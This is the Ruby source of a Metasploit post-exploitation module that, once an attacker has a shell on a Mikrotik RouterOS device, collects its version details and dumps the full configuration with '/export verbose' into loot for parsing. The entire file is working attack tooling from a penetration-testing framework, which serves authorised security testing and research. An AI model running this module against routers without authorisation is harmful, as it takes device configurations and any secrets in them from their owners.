Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Auxiliary::Mikrotik
8

9
  def initialize(info = {})
10
    super(
11
      update_info(
12
        info,
13
        'Name' => 'Mikrotik Gather Device General Information',
14
        'Description' => %q{
15
          This module collects Mikrotik device information and configuration.
16
          This module has been tested against RouterOS 6.45.9.
17
        },
18
        'License' => MSF_LICENSE,
19
        'Author' => ['h00die'],
20
        'Platform' => ['mikrotik'],
21
        'SessionTypes' => ['shell'],
22
        'Notes' => {
23
          'Stability' => [CRASH_SAFE],
24
          'SideEffects' => [IOC_IN_LOGS],
25
          'Reliability' => []
26
        }
27
      )
28
    )
29
  end
30

31
  def run
32
    # Get device prompt
33
    prompt = session.shell_command("/\n")
34

35
    # https://wiki.mikrotik.com/wiki/Manual:Console#Safe_Mode
36
    if prompt.include?('<SAFE>') # safe mode from ctr+x
37
      vprint_status('In safe mode')
38
    end
39

40
    # Get version info
41
    print_status('Getting version information')
42
    version_out = session.shell_command("/system package print without-paging\n")
43

44
    ver_loc = store_loot('mikrotik.version',
45
                         'text/plain',
46
                         session,
47
                         version_out.strip,
48
                         'version.txt',
49
                         'Mikrotik Version')
50

51
    # Print the version of VERBOSE set to true.
52
    vprint_good(version_out)
53
    vprint_good("Version information stored in to loot #{ver_loc}")
54

55
    # run additional information gathering
56
    enum_configs
57
  end
58

59
  # run commands found in exec mode under privilege 1
60
  def enum_configs
61
    host = session.session_host
62
    port = session.session_port
63
    exec_commands = [
64
      {
65
        'cmd' => '/export verbose',
66
        'fn' => 'get_config',
67
        'desc' => 'Get Device Config on Mikrotik Device'
68
      },
69
    ]
70
    exec_commands.each do |ec|
71
      command = ec['cmd']
72
      cmd_out = session.shell_command(command).gsub(/#{command}/, '')
73
      print_status("Gathering info from #{command}")
74
      # detect if we're in pagination and get as much data as possible
75
      if ec['fn'] == 'get_config'
76
        mikrotik_routeros_config_eater(host, port, cmd_out.strip)
77
      else
78
        cmd_loc = store_loot("mikrotik.#{ec['fn']}",
79
                             'text/plain',
80
                             session,
81
                             cmd_out.strip,
82
                             "#{ec['fn']}.txt",
83
                             ec['desc'])
84
        vprint_good("Saving to #{cmd_loc}")
85
      end
86
    end
87
  end
88
end
89

90